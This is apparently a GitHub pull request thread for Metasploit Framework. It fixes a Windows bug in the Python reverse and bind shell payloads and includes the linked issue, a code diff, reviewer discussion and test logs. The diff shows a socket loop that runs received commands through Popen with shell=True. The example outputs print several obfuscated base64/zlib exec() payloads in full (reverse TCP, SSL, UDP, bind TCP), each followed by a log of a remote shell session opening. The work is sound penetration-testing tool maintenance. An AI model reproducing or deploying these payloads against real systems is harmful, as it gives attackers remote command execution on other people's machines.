### PR TITLE
changing payload structure of python's reverse_tcp for fixing windows…

### LINKED ISSUE #18029: python/shell_reverse_tcp doesn't work on windows - 'bytes args is not allowed on Windows'
## Steps to reproduce

Metasploit:

```
msf6 > use 0
msf6 payload(python/shell_reverse_tcp) > options

Module options (payload/python/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(python/shell_reverse_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 payload(python/shell_reverse_tcp) > generate -f raw -o shell.py
[*] Writing 392 bytes to shell.py...
msf6 payload(python/shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(python/shell_reverse_tcp) >
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] 127.0.0.1 - Command shell session 1 closed.
Interrupt: use the 'exit' command to quit
msf6 payload(python/shell_reverse_tcp) >
```

The target's output:

```
c:\metasploit-framework>python shell.py
Traceback (most recent call last):
  File "c:\metasploit-framework\shell.py", line 1, in <module>
    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNpNjsFqwzAMhs/2U/hWmwWTlEJh4EMZGZSxray5l9RWqWlmG8nZXn/2mkOl06f/Q5L/ThGzoGhvkMVIgrhfRvM5YbRAVMfIKRrSd0+S3r2e9h/90JA+fr68nY7DV797V0XSNoYANku56tZb3ZbuVs2mlFL89+onEAPO8MyZM8VGsD+ya9cbxZm/iAmCdMqYtuTsjDDeOEsG9SGmmjR0hWkydUFD2flQo/2hrxDn/ECAuFBZHE3Sd6PcG51UT/9cnIU5K68QBCej4n87p1aM')[0])))
  File "<string>", line 9, in <module>
  File "C:\Python311\Lib\subprocess.py", line 1024, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "C:\Python311\Lib\subprocess.py", line 1425, in _execute_child
    raise TypeError('bytes args is not allowed on Windows')
TypeError: bytes args is not allowed on Windows
```

### Version

```
Framework: 6.3.18-dev-34ae293c2b
Console  : 6.3.18-dev-34ae293c2b
```

### PR DESCRIPTION
**Pull request by manishkumar102317**
Fixes #18029 where python reverse_tcp for windows is failing due to  `bytes args is not allowed on Windows`. So converted the bytes args to string on windows OS.

## Verification

List the steps needed to make sure this thing works

After fix

- [x] Start `msfconsole`
- [x] `use python/shell_reverse_tcp`
- [x] `set LHOST <ip>`
- [x] `set LPORT <port>`
- [x] **generate -f raw -o shell.py**
- [x] `to_handler` 
- [x] **Verify that you got a sessions**
- [x] `sessions`

```

Active sessions
===============

  Id  Name  Type                 Information  Connection
  --  ----  ----                 -----------  ----------
  1         shell python/python               <connection_info>
``` 

Normal Flow

- [x] Start `msfconsole`
- [x] `use python/shell_reverse_tcp`
- [x] `set LHOST <ip>`
- [x] `set LPORT <port>`
- [x] **generate -f raw -o shell.py**
- [x] `to_handler` 
- [x] **Verify that you got a sessions**
- [x] `sessions`

```
  File "C:\Python311\Lib\subprocess.py", line 1425, in _execute_child
    raise TypeError('bytes args is not allowed on Windows')
TypeError: bytes args is not allowed on Windows

Without getting any session
```

### CODE REVIEW

File: modules/payloads/singles/python/shell_reverse_tcp.rb [hunk 1]
```diff
@@ -45,15 +45,19 @@ def command_string
...
-      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
-      	o=p.stdout.read()+p.stderr.read()
-      	so.send(o)
+        d=so.recv(1024)
+        if len(d)==0:
+          break
+        if platform.system()=='Windows':
+          p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+        else:
+          p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
```
Comment (smcintyre-r7) [inline modules/payloads/singles/python/shell_reverse_tcp.rb:58]: I don't think `Popen` needs to take a bytes argument on non-Windows systems. It'd be worth checking if all this could be simplified by decoding the bytes returned from the socket `recv` call to a string on Python versions 3+.

Comment (manishkumarr1017) [reply modules/payloads/singles/python/shell_reverse_tcp.rb]: As you have suggested. I have tested whether we can keep the decoded bytes argument for non windows. Tested it on ubuntu-18.04 python 2.7.17 and python 3.6.9
ubuntu-20.04 python 3.8.10 and 3.11.3
I have verified that I got the shell for all the above case. so decoded bytes argument irrespective of platform.

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
This actually affects more than just this payload. It also affects all the modules listed at https://github.com/search?q=repo%3Arapid7%2Fmetasploit-framework%20r.Popen(d&type=code. I'd look at also implementing changes for all of these modules as well to make sure we are getting a true fix to this issue vs just the one you found the bug in.

**Comment by manish-anchanto1017** [comment]
> Look like this might affect more files. Looking at https://github.com/search?q=repo%3Arapid7%2Fmetasploit-framework+Popen+path%3A%2F%5Emodules%5C%2Fpayloads%5C%2F%2F&type=code shows more files that use `POpen`. Of these the following will need updating:
> 
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_sctp.rb#L54
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_bind_tcp.rb#L45
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb#L56
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_tcp.rb#L54
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb#L64
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_udp.rb#L55

Shall I update all these files in the same PR then?

**Comment by manishkumarr1017** [comment]
> Look like this might affect more files. Looking at https://github.com/search?q=repo%3Arapid7%2Fmetasploit-framework+Popen+path%3A%2F%5Emodules%5C%2Fpayloads%5C%2F%2F&type=code shows more files that use `POpen`. Of these the following will need updating:
> 
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_sctp.rb#L54
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_bind_tcp.rb#L45
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb#L56
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_tcp.rb#L54
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb#L64
> * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_udp.rb#L55

shall I make changes in the same PR? or shall I make another PR?

**Comment by gwillcox-r7** [comment]
> > Look like this might affect more files. Looking at https://github.com/search?q=repo%3Arapid7%2Fmetasploit-framework+Popen+path%3A%2F%5Emodules%5C%2Fpayloads%5C%2F%2F&type=code shows more files that use `POpen`. Of these the following will need updating:
> > 
> > * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_sctp.rb#L54
> > * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_bind_tcp.rb#L45
> > * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb#L56
> > * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_tcp.rb#L54
> > * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb#L64
> > * https://github.com/rapid7/metasploit-framework/blob/70d0b5eee6e19fe5e220ed45bd534d47d0932e9d/modules/payloads/singles/python/shell_reverse_udp.rb#L55
> 
> shall I make changes in the same PR? or shall I make another PR? I think this issue only causes when the OS is windows.

Same PR preferably.

> I think this issue only causes when the OS is windows.

Python runs on multiple platforms and we have multiple Python payloads all of which could run on Windows. I'm not seeing how the fact this only affects Windows would change which payloads are affected from the list above?

**Comment by manishkumarr1017** [comment]
yeah sure. I will update the PR soon.

**Review by gwillcox-r7 — APPROVED** [review]

**Review by cdelafuente-r7 — APPROVED** [review]

**Comment by cdelafuente-r7** [comment]
Thanks @manishkumarr1017 ! This looks good to me. I tested against Windows 11 with Python 3.11.4 and make sure I got a session with each payload. I also make sure it works on Windows 7 with Python 2.7 and Linux with Python 3.11.2. Note that I couldn't test `python/shell_reverse_sctp` since Windows doesn't support the SCTP protocol natively. I'll go ahead and land it. 

### Example output
<details>
<summary>`cmd/unix/reverse_python_ssl`</summary>

```
msf6 payload(cmd/unix/reverse_python_ssl) > generate -f raw
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNptj11LwzAUhq+bX5G7JhjDOopMIRdDujJEHW73pTZnrBiTkpNu9N+b0vqJuQnneT84p33vnA8UXfMGQWD/2nnXAKJwKBANQacmTU4fm6f1pto+FQcxj/vn+4dqf3gp1o88ZmTjrIUmMJZmt0uZ3axklucyS0UeH48WFcvlxddd9dXLSTmoTW0QyOXUGqDWBVoOdyTRdagVSg/NmWWLZc5J0h6pActGhSu1iKakHKiiB98DScYj1Pcxcue62Sw1NE4DS/twvF6lXOAJjFFjTGDQrg+/cttdMWLw/j/c2r80bja1VOfa9KBGTU4krl9rxukV/YSxdYYxJRGsZj/DnHwAhdiLaQ==')[0])))"
msf6 payload(cmd/unix/reverse_python_ssl) > to_handler
[*] Payload Handler Started as Job 2

[*] Started reverse SSL handler on 192.168.144.1:4444
msf6 payload(cmd/unix/reverse_python_ssl) > [*] Command shell session 2 opened (192.168.144.1:4444 -> 192.168.144.139:52345) at 2023-06-08 16:20:36 +0200

msf6 payload(cmd/unix/reverse_python_ssl) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  2         shell cmd/unix               192.168.144.1:4444 -> 192.168.144.139:52345 (192.168.144.139)
```

</details>

<details>
<summary>`python/shell_bind_tcp`</summary>

```
msf6 payload(python/shell_bind_tcp) > generate -f raw
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNpNj9FuwiAUhq/LU/SukDEirjG6hAtjusQs28zsvWnhGIm1EA7dXn+gvRh33/9/cA725l2IJTp9hVh2WCKxczT1PjgNiDkOBJ1C8fAoiu3baf/ZtBzF8Wv3fjq23832gyVJ9HY0lFZysxRytRayroV82VS8TofdjcFihJHKDLwzJqgUdlqDj5SR34sdoGzDBK+kMLkKoH+oXCxrRgp7Lod01zClFqkv+gDdlRReBXFwPjfCgHYGaDXF8/O6YhwvMAwqP8gxGjtmdX9oMrgp/iMIYaY0yCkvHkaa3xnKnu6cnJlJkVZDSJ91jPwB63NmVg==')[0])))
msf6 payload(python/shell_bind_tcp) > to_handler
[*] Payload Handler Started as Job 3

[*] Started bind TCP handler against 192.168.144.139:4444
msf6 payload(python/shell_bind_tcp) > [*] Command shell session 3 opened (192.168.144.1:59600 -> 192.168.144.139:4444) at 2023-06-08 16:30:23 +0200

msf6 payload(python/shell_bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type                 Information  Connection
  --  ----  ----                 -----------  ----------
  3         shell python/python               192.168.144.1:59600 -> 192.168.144.139:4444 (192.168.144.139)
```

</details>

<details>
<summary>`python/shell_reverse_tcp`</summary>

```
msf6 payload(python/shell_reverse_tcp) > generate -f raw
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNpNjk1PAyEQhs/wK7gtxJWUZmOqCYfGrElj1MbuvdnCNCVdgTCs/n3B7sG5PfM+8+G+YkiZYTBXyGxEhtQtrfkUUzCAWNuJYtAobx5HuX057t77oUV5+Hh+PR6Gz377JookTfAeTOa8UY9rqR42UnWdVE3blRKC/lzcBGxIMzxRYnWZSGC+uVqtO0GJO7MJPLdC61XJySnBeKUk6iT3IdZEWjDBAm/mfL7fNKLFC0yTrgtbzNb5qu72fYUw538EKS1UDgUd5c0o90fLxd0fF2dhSsprCN7yIOgv0cBcSw==')[0])))
msf6 payload(python/shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.144.1:4444
msf6 payload(python/shell_reverse_tcp) > [*] Command shell session 1 opened (192.168.144.1:4444 -> 192.168.144.139:52385) at 2023-06-08 17:37:38 +0200

msf6 payload(python/shell_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                 Information  Connection
  --  ----  ----                 -----------  ----------
  1         shell python/python               192.168.144.1:4444 -> 192.168.144.139:52385 (192.168.144.139)
```

</details>

<details>
<summary>`python/shell_reverse_tcp_ssl`</summary>

```
msf6 payload(python/shell_reverse_tcp_ssl) > generate -f raw
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNpNjsFqwzAQRM/WV/hmibpLHExJCzqE4kAobUPju1GkDTFRLKGVm9+vnLile3uzszPbX7wLMSenzxhzRTmxfpbGgw9OI9Ekhz+ZLCMnCe4nnGC96bYfTVsS7D9f37p9+9Ws30UygXbDgDpyXlTPS6ieVlDVNVRFWacR4pZDFq5B+e43zgl2PfUW8zaM+MIyI1NQQP3Nq8WyFizrj7nFgRsh5SLts0NAdWaZlwF2zk8bMKidQV6M8fi4KkRJJ7RWToElRdMPk3W7ayZwY/xHGMJMqchJD3dH6leGi4cbJ8/MLEuvEQ5GWcvT3z/beGoZ')[0])))
msf6 payload(python/shell_reverse_tcp_ssl) > to_handler
[*] Payload Handler Started as Job 1
msf6 payload(python/shell_reverse_tcp_ssl) >
[*] Started reverse SSL handler on 192.168.144.1:4444

msf6 payload(python/shell_reverse_tcp_ssl) > [*] Command shell session 2 opened (192.168.144.1:4444 -> 192.168.144.139:52392) at 2023-06-08 17:45:53 +0200

msf6 payload(python/shell_reverse_tcp_ssl) > sessions

Active sessions
===============

  Id  Name  Type                 Information  Connection
  --  ----  ----                 -----------  ----------
  2         shell python/python               192.168.144.1:4444 -> 192.168.144.139:52392 (192.168.144.139)
```

</details>

<details>
<summary>`python/shell_reverse_udp`</summary>

```
msf6 payload(python/shell_reverse_udp) > generate -f raw
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNpNjcFOwzAQRM/xV+RmWxirriJUkHyooKAKAVXpvUrirWo1ZC2vA7+PTXNgb2/macd/BYypJuwvkOqWamJ+jqYuROyBqMSREVrSV0+QXj8ft++bgyL9+fH4enx62a/fJEPbcc5+zn6A+hAneGAVoSYYXUKBSnBzv9TmbqVN02jDVZNPSlY5m7UI/bcwi2WTA3+qBxiFk9Yu8pOqi9BeWBVs1DsMpdEOenQg+JROtysuFZ1hGGxZVZScH4u63W0K4JT+EcQ4Ux5CG/TVyPutE/Lmj7MzM/sFiupaCg==')[0])))
msf6 payload(python/shell_reverse_udp) > to_handler
[*] Payload Handler Started as Job 2

[*] Started reverse UDP handler on 192.168.100.1:4444
msf6 payload(python/shell_reverse_udp) > [*] Command shell session 3 opened (0.0.0.0:4444 -> 192.168.100.119:53383) at 2023-06-08 17:47:23 +0200

msf6 payload(python/shell_reverse_udp) > sessions

Active sessions
===============

  Id  Name  Type                 Information  Connection
  --  ----  ----                 -----------  ----------
  3         shell python/python               0.0.0.0:4444 -> 192.168.100.119:53383 (192.168.100.119)
```

</details>

**Comment by cdelafuente-r7** [comment]
# Release Notes
This fixes a Python's payload issue with Windows where it was failing due to `bytes args is not allowed on Windows`.
